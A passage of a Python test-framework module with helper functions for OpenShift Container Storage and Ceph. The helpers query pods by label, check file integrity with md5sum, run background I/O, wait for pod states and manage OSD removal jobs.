        pool_name (str): Name of the pool to get the ceph images

    Returns (List): List of RBD images in the pool
    """
    ct_pod = get_ceph_tools_pod()
    return ct_pod.exec_ceph_cmd(ceph_cmd=f"rbd ls {pool_name}", format="json")


@retry(TypeError, tries=5, delay=2, backoff=1)
def check_file_existence(pod_obj, file_path):
    """
    Check if file exists inside the pod

    Args:
        pod_obj (Pod): The object of the pod
        file_path (str): The full path of the file to look for inside
            the pod

    Returns:
        bool: True if the file exists, False otherwise
    """
    try:
        check_if_executable_in_path(pod_obj.exec_cmd_on_pod("which find"))
    except CommandFailed:
        pod_obj.install_packages("findutils")
    ret = pod_obj.exec_cmd_on_pod(f'bash -c "find {file_path}"')
    if re.search(file_path, ret):
        return True
    return False


def get_file_path(pod_obj, file_name):
    """
    Get the full path of the file

    Args:
        pod_obj (Pod): The object of the pod
        file_name (str): The name of the file for which path to get

    Returns:
        str: The full path of the file
    """
    path = (
        pod_obj.get()
        .get("spec")
        .get("containers")[0]
        .get("volumeMounts")[0]
        .get("mountPath")
    )
    file_path = os.path.join(path, file_name)
    return file_path


def cal_md5sum(pod_obj, file_name, block=False):
    """
    Calculates the md5sum of the file

    Args:
        pod_obj (Pod): The object of the pod
        file_name (str): The name of the file for which md5sum to be calculated
        block (bool): True if the volume mode of PVC used on pod is 'Block'.
            file_name will be the devicePath in this case.

    Returns:
        str: The md5sum of the file
    """
    file_path = file_name if block else get_file_path(pod_obj, file_name)
    md5sum_cmd_out = pod_obj.exec_cmd_on_pod(
        command=f'bash -c "md5sum {file_path}"', out_yaml_format=False
    )
    md5sum = md5sum_cmd_out.split()[0]
    logger.info(f"md5sum of file {file_name}: {md5sum}")
    return md5sum


def verify_data_integrity(pod_obj, file_name, original_md5sum, block=False):
    """
    Verifies existence and md5sum of the file created from the first pod

    Args:
        pod_obj (Pod): The object of the pod
        file_name (str): The name of the file for which md5sum to be calculated
        original_md5sum (str): The original md5sum of the file
        block (bool): True if the volume mode of PVC used on pod is 'Block'.
            file_name will be the devicePath in this case.

    Returns:
        bool: True if the file exists and md5sum matches

    Raises:
        AssertionError: If file doesn't exist or md5sum mismatch
    """
    file_path = file_name if block else get_file_path(pod_obj, file_name)
    assert check_file_existence(pod_obj, file_path), f"File {file_name} doesn't exist"
    current_md5sum = cal_md5sum(pod_obj, file_name, block)
    logger.info(f"Original md5sum of file: {original_md5sum}")
    logger.info(f"Current md5sum of file: {current_md5sum}")
    assert current_md5sum == original_md5sum, "Data corruption found"
    logger.info(f"File {file_name} exists and md5sum matches")
    return True


def get_fio_rw_iops(pod_obj):
    """
    Execute FIO on a pod

    Args:
        pod_obj (Pod): The object of the pod
    """
    fio_result = pod_obj.get_fio_results()
    logging.info(f"FIO output: {fio_result}")
    logging.info("IOPs after FIO:")
    logging.info(f"Read: {fio_result.get('jobs')[0].get('read').get('iops')}")
    logging.info(f"Write: {fio_result.get('jobs')[0].get('write').get('iops')}")


def run_io_in_bg(pod_obj, expect_to_fail=False, fedora_dc=False):
    """
    Run I/O in the background

    Args:
        pod_obj (Pod): The object of the pod
        expect_to_fail (bool): True for the command to be expected to fail
            (disruptive operations), False otherwise
        fedora_dc (bool): set to False by default. If set to True, it runs IO
            in background on a fedora dc pod.

    Returns:
        Thread: A thread of the I/O execution
    """
    logger.info(f"Running I/O on pod {pod_obj.name}")

    def exec_run_io_cmd(pod_obj, expect_to_fail, fedora_dc):
        """
        Execute I/O
        """
        try:
            # Writing content to a new file every 0.01 seconds.
            # Without sleep, the device will run out of space very quickly -
            # 5-10 seconds for a 5GB device
            if fedora_dc:
                FILE = FEDORA_TEST_FILE
            else:
                FILE = TEST_FILE
            pod_obj.exec_cmd_on_pod(
                command=f'bash -c "let i=0; while true; do echo '
                f'{TEXT_CONTENT} >> {FILE}$i; let i++; sleep 0.01; done"',
                timeout=2400,
            )
        # Once the pod gets deleted, the I/O execution will get terminated.
# Hence, catching this exception except CommandFailed as ex: if expect_to_fail: if re.search("code 137", str(ex)) or (re.search("code 143", str(ex))): logger.info("I/O command got terminated as expected") return raise ex thread = Thread(target=exec_run_io_cmd, args=(pod_obj, expect_to_fail, fedora_dc)) thread.start() time.sleep(2) # Checking file existence if fedora_dc: FILE = FEDORA_TEST_FILE else: FILE = TEST_FILE test_file = FILE + "1" # Check I/O started try: for sample in TimeoutSampler( timeout=20, sleep=1, func=check_file_existence, pod_obj=pod_obj, file_path=test_file, ): if sample: break logger.info(f"Waiting for I/O to start inside {pod_obj.name}") except TimeoutExpiredError: logger.error( f"Wait timeout: I/O failed to start inside {pod_obj.name}. " "Collect file list." ) parent_dir = os.path.join(TEST_FILE, os.pardir) pod_obj.exec_cmd_on_pod( command=f"ls -l {os.path.abspath(parent_dir)}", out_yaml_format=False ) raise TimeoutExpiredError(f"I/O failed to start inside {pod_obj.name}") return thread def get_admin_key_from_ceph_tools(): """ Fetches admin key secret from ceph Returns: admin keyring encoded with base64 as a string """ tools_pod = get_ceph_tools_pod() out = tools_pod.exec_ceph_cmd(ceph_cmd="ceph auth get-key client.admin") base64_output = base64.b64encode(out["key"].encode()).decode() return base64_output def run_io_and_verify_mount_point(pod_obj, bs="10M", count="950"): """ Run I/O on mount point Args: pod_obj (Pod): The object of the pod bs (str): Read and write up to bytes at a time count (str): Copy only N input blocks Returns: used_percentage (str): Used percentage on mount point """ pod_obj.exec_cmd_on_pod( command=f"dd if=/dev/urandom of=/var/lib/www/html/dd_a bs={bs} count={count}" ) # Verify data's are written to mount-point mount_point = pod_obj.exec_cmd_on_pod(command="df -kh") mount_point = mount_point.split() used_percentage = mount_point[mount_point.index("/var/lib/www/html") - 1] return used_percentage def get_pods_having_label(label, namespace): """ Fetches pod resources with given label in given namespace Args: label (str): label which pods might have namespace (str): Namespace in which to be looked up Return: list: of pods info """ ocp_pod = OCP(kind=constants.POD, namespace=namespace) pods = ocp_pod.get(selector=label).get("items") return pods def get_deployments_having_label(label, namespace): """ Fetches deployment resources with given label in given namespace Args: label (str): label which deployments might have namespace (str): Namespace in which to be looked up Return: list: deployment OCP instances """ ocp_deployment = OCP(kind=constants.DEPLOYMENT, namespace=namespace) pods = ocp_deployment.get(selector=label).get("items") return pods def get_mds_pods(mds_label=constants.MDS_APP_LABEL, namespace=None): """ Fetches info about mds pods in the cluster Args: mds_label (str): label associated with mds pods (default: defaults.MDS_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : of mds pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] mdss = get_pods_having_label(mds_label, namespace) mds_pods = [Pod(**mds) for mds in mdss] return mds_pods def get_mon_pods(mon_label=constants.MON_APP_LABEL, namespace=None): """ Fetches info about mon pods in the cluster Args: mon_label (str): label associated with mon pods (default: defaults.MON_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: 
list : of mon pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] mons = get_pods_having_label(mon_label, namespace) mon_pods = [Pod(**mon) for mon in mons] return mon_pods def get_mgr_pods(mgr_label=constants.MGR_APP_LABEL, namespace=None): """ Fetches info about mgr pods in the cluster Args: mgr_label (str): label associated with mgr pods (default: defaults.MGR_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : of mgr pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] mgrs = get_pods_having_label(mgr_label, namespace) mgr_pods = [Pod(**mgr) for mgr in mgrs] return mgr_pods def get_osd_pods(osd_label=constants.OSD_APP_LABEL, namespace=None): """ Fetches info about osd pods in the cluster Args: osd_label (str): label associated with osd pods (default: defaults.OSD_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : of osd pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] osds = get_pods_having_label(osd_label, namespace) osd_pods = [Pod(**osd) for osd in osds] return osd_pods def get_osd_prepare_pods( osd_prepare_label=constants.OSD_PREPARE_APP_LABEL, namespace=defaults.ROOK_CLUSTER_NAMESPACE, ): """ Fetches info about osd prepare pods in the cluster Args: osd_prepare_label (str): label associated with osd prepare pods (default: constants.OSD_PREPARE_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list: OSD prepare pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] osds = get_pods_having_label(osd_prepare_label, namespace) osd_pods = [Pod(**osd) for osd in osds] return osd_pods def get_osd_deployments(osd_label=constants.OSD_APP_LABEL, namespace=None): """ Fetches info about osd deployments in the cluster Args: osd_label (str): label associated with osd deployments (default: defaults.OSD_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list: OSD deployment OCS instances """ namespace = namespace or config.ENV_DATA["cluster_namespace"] osds = get_deployments_having_label(osd_label, namespace) osd_deployments = [OCS(**osd) for osd in osds] return osd_deployments def get_pod_count(label, namespace=None): namespace = namespace or config.ENV_DATA["cluster_namespace"] pods = get_pods_having_label(label=label, namespace=namespace) return len(pods) def get_cephfsplugin_provisioner_pods( cephfsplugin_provisioner_label=constants.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL, namespace=None, ): """ Fetches info about CSI Cephfs plugin provisioner pods in the cluster Args: cephfsplugin_provisioner_label (str): label associated with cephfs provisioner pods (default: defaults.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : csi-cephfsplugin-provisioner Pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] pods = get_pods_having_label(cephfsplugin_provisioner_label, namespace) fs_plugin_pods = [Pod(**pod) for pod in pods] return fs_plugin_pods def get_rbdfsplugin_provisioner_pods( rbdplugin_provisioner_label=constants.CSI_RBDPLUGIN_PROVISIONER_LABEL, namespace=None, ): """ Fetches info about CSI Cephfs plugin provisioner pods in the cluster Args: rbdplugin_provisioner_label (str): label associated with RBD 
provisioner pods
            (default: constants.CSI_RBDPLUGIN_PROVISIONER_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list : csi-rbdplugin-provisioner Pod objects
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    pods = get_pods_having_label(rbdplugin_provisioner_label, namespace)
    rbd_plugin_pods = [Pod(**pod) for pod in pods]
    return rbd_plugin_pods


def get_pod_obj(name, namespace=None):
    """
    Returns the pod obj for the given pod

    Args:
        name (str): Name of the resource

    Returns:
        obj : A pod object
    """
    ocp_obj = OCP(api_version="v1", kind=constants.POD, namespace=namespace)
    ocp_dict = ocp_obj.get(resource_name=name)
    pod_obj = Pod(**ocp_dict)
    return pod_obj


def get_pod_logs(
    pod_name, container=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, previous=False
):
    """
    Get logs from a given pod

    Args:
        pod_name (str): Name of the pod
        container (str): Name of the container
        namespace (str): Namespace of the pod
        previous (bool): True, if pod previous log required. False otherwise.

    Returns:
        str: Output from 'oc logs <pod_name>' command
    """
    pod = OCP(kind=constants.POD, namespace=namespace)
    cmd = f"logs {pod_name}"
    if container:
        cmd += f" -c {container}"
    if previous:
        cmd += " --previous"
    return pod.exec_oc_cmd(cmd, out_yaml_format=False)


def get_pod_node(pod_obj):
    """
    Get the node that the pod is running on

    Args:
        pod_obj (OCS): The pod object

    Returns:
        ocs_ci.ocs.ocp.OCP: The node object
    """
    node_name = pod_obj.get().get("spec").get("nodeName")
    return node.get_node_objs(node_names=node_name)[0]


def delete_pods(pod_objs, wait=True):
    """
    Deletes list of the pod objects

    Args:
        pod_objs (list): List of the pod objects to be deleted
        wait (bool): Determines if the delete command should wait for
            completion

    """
    for pod in pod_objs:
        pod.delete(wait=wait)


def validate_pods_are_respinned_and_running_state(pod_objs_list):
    """
    Verifies the list of the pods are respinned and in running state

    Args:
        pod_objs_list (list): List of the pods obj

    Returns:
        bool : True if the pods are respinned and running, False otherwise

    Raises:
        ResourceWrongStatusException: In case the resources haven't reached
            the Running state

    """
    for pod in pod_objs_list:
        helpers.wait_for_resource_state(pod, constants.STATUS_RUNNING, timeout=180)

    for pod in pod_objs_list:
        pod_obj = pod.get()
        start_time = pod_obj["status"]["startTime"]
        ts = time.strptime(start_time, "%Y-%m-%dT%H:%M:%SZ")
        ts = calendar.timegm(ts)
        current_time_utc = time.time()
        sec = current_time_utc - ts
        if (sec / 3600) >= 1:
            logger.error(
                f"Pod {pod.name} is not respinned, the age of the pod is "
                f"{start_time}"
            )
            return False

    return True


def verify_node_name(pod_obj, node_name):
    """
    Verifies that the pod is running on a particular node

    Args:
        pod_obj (Pod): The pod object
        node_name (str): The name of node to check

    Returns:
        bool: True if the pod is running on a particular node, False otherwise
    """
    logger.info(
        f"Checking whether the pod {pod_obj.name} is running on "
        f"node {node_name}"
    )
    actual_node = pod_obj.get().get("spec").get("nodeName")
    if actual_node == node_name:
        logger.info(
            f"The pod {pod_obj.name} is running on the specified node "
            f"{actual_node}"
        )
        return True
    else:
        logger.info(
            f"The pod {pod_obj.name} is not running on the specified node. "
            f"Specified node: {node_name}, actual node: {actual_node}"
        )
        return False


def get_pvc_name(pod_obj):
    """
    Function to get pvc_name from pod_obj

    Args:
        pod_obj (str): The pod object

    Returns:
        str: The pvc name of a given pod_obj

    Raises:
        UnavailableResourceException: If no pvc 
attached """ pvc = pod_obj.get().get("spec").get("volumes")[0].get("persistentVolumeClaim") if not pvc: raise UnavailableResourceException return pvc.get("claimName") def get_used_space_on_mount_point(pod_obj): """ Get the used space on a mount point Args: pod_obj (POD): The pod object Returns: int: Percentage represent the used space on the mount point """ # Verify data's are written to mount-point mount_point = pod_obj.exec_cmd_on_pod(command="df -kh") mount_point = mount_point.split() used_percentage = mount_point[mount_point.index(constants.MOUNT_POINT) - 1] return used_percentage def get_plugin_pods(interface, namespace=None): """ Fetches info of csi-cephfsplugin pods or csi-rbdplugin pods Args: interface (str): Interface type. eg: CephBlockPool, CephFileSystem namespace (str): Name of cluster namespace Returns: list : csi-cephfsplugin pod objects or csi-rbdplugin pod objects """ if interface == constants.CEPHFILESYSTEM: plugin_label = constants.CSI_CEPHFSPLUGIN_LABEL if interface == constants.CEPHBLOCKPOOL: plugin_label = constants.CSI_RBDPLUGIN_LABEL namespace = namespace or config.ENV_DATA["cluster_namespace"] plugins_info = get_pods_having_label(plugin_label, namespace) plugin_pods = [Pod(**plugin) for plugin in plugins_info] return plugin_pods def get_plugin_provisioner_leader(interface, namespace=None, leader_type="provisioner"): """ Get csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod Args: interface (str): Interface type. eg: CephBlockPool, CephFileSystem namespace (str): Name of cluster namespace leader_type (str): Parameter to check the lease. eg: 'snapshotter' to select external-snapshotter leader holder Returns: Pod: csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod """ namespace = namespace or config.ENV_DATA["cluster_namespace"] leader_types = { "provisioner": namespace, "snapshotter": f"external-snapshotter-leader-{namespace}", "resizer": f"external-resizer-{namespace}", "attacher": f"external-attacher-{namespace}", } if interface == constants.CEPHBLOCKPOOL: lease_cmd = f"get leases {leader_types[leader_type]}-rbd-csi-ceph-com -o yaml" elif interface == constants.CEPHFILESYSTEM: lease_cmd = ( f"get leases {leader_types[leader_type]}-cephfs-csi-ceph-com " "-o yaml" ) ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace) lease = ocp_obj.exec_oc_cmd(command=lease_cmd) leader = lease.get("spec").get("holderIdentity").strip() assert leader, "Couldn't identify plugin provisioner leader pod." 
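
    # The lease's holderIdentity names the provisioner pod that currently
    # holds the leader election lock; it is resolved to a Pod object below
    # by pointing the OCP wrapper at that resource name.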
logger.info(f"Plugin provisioner leader pod is {leader}") ocp_obj._resource_name = leader leader_pod = Pod(**ocp_obj.get()) return leader_pod def get_operator_pods(operator_label=constants.OPERATOR_LABEL, namespace=None): """ Fetches info about rook-ceph-operator pods in the cluster Args: operator_label (str): Label associated with rook-ceph-operator pod namespace (str): Namespace in which ceph cluster lives Returns: list : of rook-ceph-operator pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] operators = get_pods_having_label(operator_label, namespace) operator_pods = [Pod(**operator) for operator in operators] return operator_pods def upload(pod_name, localpath, remotepath, namespace=None): """ Upload a file to pod Args: pod_name (str): Name of the pod localpath (str): Local file to upload remotepath (str): Target path on the pod """ namespace = namespace or constants.DEFAULT_NAMESPACE cmd = ( f"oc -n {namespace} cp {os.path.expanduser(localpath)} {pod_name}:{remotepath}" ) run_cmd(cmd) def download_file_from_pod(pod_name, remotepath, localpath, namespace=None): """ Download a file from a pod Args: pod_name (str): Name of the pod remotepath (str): Target path on the pod localpath (str): Local file to upload namespace (str): The namespace of the pod """ namespace = namespace or constants.DEFAULT_NAMESPACE cmd = ( f"oc -n {namespace} cp {pod_name}:{remotepath} {os.path.expanduser(localpath)}" ) run_cmd(cmd) def wait_for_storage_pods(timeout=200): """ Check all OCS pods status, they should be in Running or Completed state Args: timeout (int): Number of seconds to wait for pods to get into correct state """ all_pod_obj = get_all_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE) # Ignoring pods with "app=rook-ceph-detect-version" app label all_pod_obj = [ pod for pod in all_pod_obj if pod.get_labels() and constants.ROOK_CEPH_DETECT_VERSION_LABEL not in pod.get_labels() ] for pod_obj in all_pod_obj: state = constants.STATUS_RUNNING if any(i in pod_obj.name for i in ["-1-deploy", "ocs-deviceset"]): state = constants.STATUS_COMPLETED try: helpers.wait_for_resource_state( resource=pod_obj, state=state, timeout=timeout ) except ResourceWrongStatusException: # 'rook-ceph-crashcollector' on the failed node stucks at # pending state. BZ 1810014 tracks it. # Ignoring 'rook-ceph-crashcollector' pod health check as # WA and deleting its deployment so that the pod # disappears. Will revert this WA once the BZ is fixed if "rook-ceph-crashcollector" in pod_obj.name: ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE) pod_name = pod_obj.name deployment_name = "-".join(pod_name.split("-")[:-2]) command = f"delete deployment {deployment_name}" ocp_obj.exec_oc_cmd(command=command) logger.info(f"Deleted deployment for pod {pod_obj.name}") else: raise def verify_pods_upgraded(old_images, selector, count=1, timeout=720): """ Verify that all pods do not have old image. Args: old_images (set): Set with old images. selector (str): Selector (e.g. app=ocs-osd) count (int): Number of resources for selector. timeout (int): Timeout in seconds to wait for pods to be upgraded. Raises: TimeoutException: If the pods didn't get upgraded till the timeout. """ namespace = config.ENV_DATA["cluster_namespace"] pod = OCP( kind=constants.POD, namespace=namespace, ) info_message = ( f"Waiting for {count} pods with selector: {selector} to be running " f"and upgraded." 
) logger.info(info_message) start_time = time.time() selector_label, selector_value = selector.split("=") while True: pod_count = 0 try: pods = get_all_pods(namespace, [selector_value], selector_label) pods_len = len(pods) logger.info(f"Found {pods_len} pod(s) for selector: {selector}") if pods_len != count: logger.warning( f"Number of found pods {pods_len} is not as expected: " f"{count}" ) for pod in pods: verify_images_upgraded(old_images, pod.get()) pod_count += 1 except CommandFailed as ex: logger.warning( f"Failed when getting pods with selector {selector}." f"Error: {ex}" ) except NonUpgradedImagesFoundError as ex: logger.warning(ex) check_timeout_reached(start_time, timeout, info_message) if pods_len != count: logger.error(f"Found pods: {pods_len} but expected: {count}!") elif pod_count == count: return def get_noobaa_pods(noobaa_label=constants.NOOBAA_APP_LABEL, namespace=None): """ Fetches info about noobaa pods in the cluster Args: noobaa_label (str): label associated with osd pods (default: defaults.NOOBAA_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : of noobaa pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] noobaas = get_pods_having_label(noobaa_label, namespace) noobaa_pods = [Pod(**noobaa) for noobaa in noobaas] return noobaa_pods def wait_for_dc_app_pods_to_reach_running_state( dc_pod_obj, timeout=120, exclude_state=None ): """ Wait for DC app pods to reach running state Args: dc_pod_obj (list): list of dc app pod objects timeout (int): Timeout in seconds to wait for pods to be in Running state. exclude_state (str): A resource state to ignore """ for pod_obj in dc_pod_obj: name = pod_obj.get_labels().get("name") dpod_list = get_all_pods(selector_label=f"name={name}", wait=True) for dpod in dpod_list: if "-1-deploy" not in dpod.name and dpod.status != exclude_state: helpers.wait_for_resource_state( dpod, constants.STATUS_RUNNING, timeout=timeout ) def delete_deploymentconfig_pods(pod_obj): """ Delete a DeploymentConfig pod and all the pods that are controlled by it Args: pod_obj (Pod): Pod object """ dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace) pod_data_list = dc_ocp_obj.get().get("items") if pod_data_list: for pod_data in pod_data_list: if pod_obj.get_labels().get("name") == pod_data.get("metadata").get("name"): dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get("name")) dc_ocp_obj.wait_for_delete( resource_name=pod_obj.get_labels().get("name") ) def wait_for_new_osd_pods_to_come_up(number_of_osd_pods_before): status_options = ["Init:1/4", "Init:2/4", "Init:3/4", "PodInitializing", "Running"] try: for osd_pods in TimeoutSampler(timeout=180, sleep=3, func=get_osd_pods): # Check if the new osd pods has started to come up new_osd_pods = osd_pods[number_of_osd_pods_before:] new_osd_pods_come_up = [ pod.status() in status_options for pod in new_osd_pods ] if any(new_osd_pods_come_up): logging.info("One or more of the new osd pods has started to come up") break except TimeoutExpiredError: logging.warning("None of the new osd pods reached the desired status") def get_pod_restarts_count(namespace=defaults.ROOK_CLUSTER_NAMESPACE): """ Gets the dictionary of pod and its restart count for all the pods in a given namespace Returns: dict: dictionary of pod name and its corresponding restart count """ list_of_pods = get_all_pods(namespace) restart_dict = {} ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace) for p in list_of_pods: 
# we don't want to compare osd-prepare and canary pods as they get created freshly when an osd needs to be added.
        if (
            "rook-ceph-osd-prepare" not in p.name
            and "rook-ceph-drain-canary" not in p.name
        ):
            restart_dict[p.name] = int(ocp_pod_obj.get_resource(p.name, "RESTARTS"))
    logging.info(f"get_pod_restarts_count: restarts dict = {restart_dict}")
    return restart_dict


def check_pods_in_running_state(
    namespace=defaults.ROOK_CLUSTER_NAMESPACE,
    pod_names=None,
    raise_pod_not_found_error=False,
):
    """
    Checks whether all the pods in a given namespace are in Running state or not

    Args:
        namespace (str): Name of cluster namespace
            (default: defaults.ROOK_CLUSTER_NAMESPACE)
        pod_names (list): List of the pod names to check.
            If not provided, it will check all the pods in the given namespace
        raise_pod_not_found_error (bool): If True, it raises an exception, if
            one of the pods in the pod names is not found. If False, it
            ignores the case of pod not found and returns the pod objects of
            the rest of the pod names. The default value is False

    Returns:
        Boolean: True, if all pods in Running state. False, otherwise

    """
    ret_val = True

    if pod_names:
        list_of_pods = get_pod_objs(pod_names, raise_pod_not_found_error)
    else:
        list_of_pods = get_all_pods(namespace)

    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    for p in list_of_pods:
        # we don't want to compare osd-prepare, canary and debug pods as
        # they get created freshly when an osd needs to be added.
        if (
            ("rook-ceph-osd-prepare" not in p.name)
            and ("rook-ceph-drain-canary" not in p.name)
            and ("debug" not in p.name)
        ):
            status = ocp_pod_obj.get_resource(p.name, "STATUS")
            if status not in "Running":
                logging.error(
                    f"The pod {p.name} is in {status} state. Expected = Running"
                )
                ret_val = False
    return ret_val


def get_running_state_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
    """
    Checks the running state pods in a given namespace.

    Returns:
        List: all the pod objects that are in running state only
    """
    list_of_pods = get_all_pods(namespace)
    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    running_pods_object = list()
    for pod in list_of_pods:
        status = ocp_pod_obj.get_resource(pod.name, "STATUS")
        if "Running" in status:
            running_pods_object.append(pod)

    return running_pods_object


def wait_for_pods_to_be_running(
    namespace=defaults.ROOK_CLUSTER_NAMESPACE,
    pod_names=None,
    raise_pod_not_found_error=False,
    timeout=200,
    sleep=10,
):
    """
    Wait for all the pods in a specific namespace to be running.

    Args:
        namespace (str): the namespace of the pods
        pod_names (list): List of the pod names to check.
            If not provided, it will check all the pods in the given namespace
        raise_pod_not_found_error (bool): If True, it raises an exception (in
            the function 'check_pods_in_running_state'), if one of the pods in
            the pod names is not found. If False, it ignores the case of pod
            not found and returns the pod objects of the rest of the pod
            names. The default value is False
        timeout (int): time to wait for pods to be running
        sleep (int): Time in seconds to sleep between attempts

    Returns:
        bool: True, if all pods in Running state. 
False, otherwise """ try: for pods_running in TimeoutSampler( timeout=timeout, sleep=sleep, func=check_pods_in_running_state, namespace=namespace, pod_names=pod_names, raise_pod_not_found_error=raise_pod_not_found_error, ): # Check if all the pods in running state if pods_running: logging.info("All the pods reached status running!") return True except TimeoutExpiredError: logging.warning( f"Not all the pods reached status running " f"after {timeout} seconds" ) return False def list_of_nodes_running_pods(selector, namespace=defaults.ROOK_CLUSTER_NAMESPACE): """ The function returns the list of nodes for the given selector Args: selector (str): The resource selector to search with Returns: list: a list of nodes that runs the given selector pods """ pod_obj_list = get_all_pods(namespace=namespace, selector=[selector]) pods_running_nodes = [get_pod_node(pod) for pod in pod_obj_list] logger.info(f"{selector} running on nodes {pods_running_nodes}") return list(set(pods_running_nodes)) def get_osd_removal_pod_name(osd_id, timeout=60): """ Get the osd removal pod name Args: osd_id (int): The osd's id to get the osd removal pod name timeout (int): The time to wait for getting the osd removal pod name Returns: str: The osd removal pod name """ ocs_version = config.ENV_DATA["ocs_version"] if Version.coerce(ocs_version) == Version.coerce("4.7"): pattern = "ocs-osd-removal-job" elif Version.coerce(ocs_version) == Version.coerce("4.8"): pattern = "ocs-osd-removal-" else: pattern = f"ocs-osd-removal-{osd_id}" try: for osd_removal_pod_names in TimeoutSampler( timeout=timeout, sleep=5, func=get_pod_name_by_pattern, pattern=pattern, ): if osd_removal_pod_names: osd_removal_pod_name = osd_removal_pod_names[0] logging.info(f"Found pod {osd_removal_pod_name}") return osd_removal_pod_name except TimeoutExpiredError: logger.warning(f"Failed to get pod by the pattern {pattern}") return None def check_toleration_on_pods(toleration_key=constants.TOLERATION_KEY): """ Function to check toleration on pods Args: toleration_key (str): The toleration key to check """ pod_objs = get_all_pods( namespace=defaults.ROOK_CLUSTER_NAMESPACE, selector=[constants.TOOL_APP_LABEL], exclude_selector=True, ) flag = False for pod_obj in pod_objs: resource_name = pod_obj.name tolerations = pod_obj.get().get("spec").get("tolerations") for key in tolerations: if key["key"] == toleration_key: flag = True if flag: logger.info(f"The Toleration {toleration_key} exists on {resource_name}") else: logger.error( f"The pod {resource_name} does not have toleration {toleration_key}" ) def run_osd_removal_job(osd_ids=None): """ Run the ocs-osd-removal job Args: osd_ids (list): The osd IDs. 
Returns: ocs_ci.ocs.resources.ocs.OCS: The ocs-osd-removal job object """ osd_ids_str = ",".join(map(str, osd_ids)) ocp_version = get_ocp_version() if Version.coerce(ocp_version) >= Version.coerce("4.6"): cmd = f"process ocs-osd-removal -p FAILED_OSD_IDS={osd_ids_str} -o yaml" else: cmd = f"process ocs-osd-removal -p FAILED_OSD_ID={osd_ids_str} -o yaml" logger.info(f"Executing OSD removal job on OSD ids: {osd_ids_str}") ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE) osd_removal_job_yaml = ocp_obj.exec_oc_cmd(cmd) # Add the namespace param, so that the ocs-osd-removal job will be created in the correct namespace osd_removal_job_yaml["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE osd_removal_job = OCS(**osd_removal_job_yaml) osd_removal_job.create(do_reload=False) return osd_removal_job def verify_osd_removal_job_completed_successfully(osd_id): """ Verify that the ocs-osd-removal job completed successfully Args: osd_id (str): The osd id Returns: bool: True, if the ocs-osd-removal job completed successfully. False, otherwise """ logger.info("Getting the ocs-osd-removal pod name") osd_removal_pod_name = get_osd_removal_pod_name(osd_id) osd_removal_pod_obj = get_pod_obj( osd_removal_pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE ) timeout = 300 try: is_completed = osd_removal_pod_obj.ocp.wait_for_resource( condition=constants.STATUS_COMPLETED, resource_name=osd_removal_pod_name, sleep=20, timeout=timeout, ) # Don't failed the test yet if the ocs-osd-removal pod job is not completed except TimeoutExpiredError: is_completed = False ocp_pod_obj = OCP(kind=constants.POD, namespace=defaults.ROOK_CLUSTER_NAMESPACE) osd_removal_pod_status = ocp_pod_obj.get_resource_status(osd_removal_pod_name) # Check if 'osd_removal_pod' is in status 'completed' if not is_completed and osd_removal_pod_status != constants.STATUS_COMPLETED: if osd_removal_pod_status != constants.STATUS_RUNNING: logger.info( f"ocs-osd-removal pod job did not reach status '{constants.STATUS_COMPLETED}' " f"or '{constants.STATUS_RUNNING}' after {timeout} seconds" ) return False else: logger.info( f"ocs-osd-removal pod job reached status '{constants.STATUS_RUNNING}'," f" but we were waiting for status '{constants.STATUS_COMPLETED}' " ) new_timeout = 900 logger.info( f"Wait more {new_timeout} seconds for ocs-osd-removal pod job to be completed" ) is_completed = osd_removal_pod_obj.ocp.wait_for_resource( condition=constants.STATUS_COMPLETED, resource_name=osd_removal_pod_name, sleep=30, timeout=new_timeout, ) if not is_completed: logger.info( f"ocs-osd-removal pod job did not complete after {new_timeout} seconds" ) return False # Verify OSD removal from the ocs-osd-removal pod logs logger.info(f"Verifying removal of OSD from {osd_removal_pod_name} pod logs") logs = get_pod_logs(osd_removal_pod_name) pattern = f"purged osd.{osd_id}" if not re.search(pattern, logs): logger.warning( f"Didn't find the removal of OSD from {osd_removal_pod_name} pod logs" ) return False return True def delete_osd_removal_job(osd_id): """ 